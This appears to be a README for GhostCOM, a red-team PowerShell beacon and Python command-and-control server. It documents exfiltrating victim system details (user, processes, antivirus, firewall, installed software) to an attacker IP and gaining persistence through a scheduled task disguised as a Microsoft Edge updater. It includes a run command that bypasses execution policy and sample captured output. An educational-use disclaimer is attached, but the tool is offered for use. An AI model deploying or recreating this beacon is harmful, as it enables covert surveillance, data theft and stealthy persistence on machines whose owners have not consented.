A COM-based PowerShell beacon for red team persistence using Task Scheduler.
GhostCOM is a custom red team beacon built with PowerShell and Python that demonstrates persistence via the COM-based Schedule.Service interface. The beacon collects system information and sends it to a custom C2 server.
- COM-based persistence using Task Scheduler (
Schedule.Service) - Beacon sends victim system info to C2
- Two versions:
- Basic: OS version, username, PC name, IP
- Advanced: Active processes, firewall status, and more
- Custom C2 built in Python
- PowerShell script runs on target machine.
- Collects system information (based on version).
- Sends info to attacker's C2 server.
- Sets up persistence using
Schedule.Serviceto auto-run on boot.
The C2 is a custom Python-based HTTP listener that receives incoming system information from beacons.
Currently, only hardcoded data is sent. Shell functionality is not implemented (yet).
- Windows machine (target system)
- PowerShell (v5+ recommended)
- Python-based C2 server running (e.g., python c2_server.py on attacker's machine)
- Adjust the IP (
http://192.168.1.193/) in the script to point to your actual C2 listener
- Start C2 Server on Attacker:
┌──(synix㉿0day)-[~/Desktop]
└─$ python3 C2.py
[+] C2 Server Running on Port 80...- Execute script on Target:
powershell.exe -ExecutionPolicy Bypass -File .\beacon.ps1-
What Happens:
One-time system info is sent to your C2 server.
A scheduled task (MicrosoftEdgeUpdaterService) is created to re-run a silent beacon on every logon.
-
C2 retrives the data:
──(synix㉿0day)-[~/Desktop]
└─$ python3 C2.py
[+] C2 Server Running on Port 80...
[+] Beacon Data Received:
Processes: Name CPU
---- ---
SearchApp 2.359375
explorer 1.953125
powershell 1.21875
RuntimeBroker 0.828125
StartMenuExperienceHost 0.609375
Time: 22-05-2025 18:21:26
Av: Windows Defender
Hostname: BLACKSITE-10
Os: Microsoft Windows 10 Pro
Uptime: 22-05-2025 18:20:58
Software: Oracle VirtualBox Guest Additions 7.1.6, Microsoft Visual C 2022 X64 Minimum Runtime - 14.44.34918,
Application Verifier x64 External Package, vs_minshellinteropx64msi, Application Verifier x64 External Package (DesktopEditions),
Microsoft Visual C 2022 X64 Debug Runtime - 14.44.34918, vs_devenx64vmsi...
Firewall: Name Enabled
---- -------
Domain True
Private True
Public True
User: RTO
192.168.1.11 - - [22/May/2025 18:21:24] "POST /collect HTTP/1.1" 200 -Caution
This tool is provided for educational and research purposes only. Use only in controlled environments with proper authorization. The author is not responsible for any misuse.
- Add shell functionality to beacon
- Encrypt beacon-C2 communication
- More functionality to beacon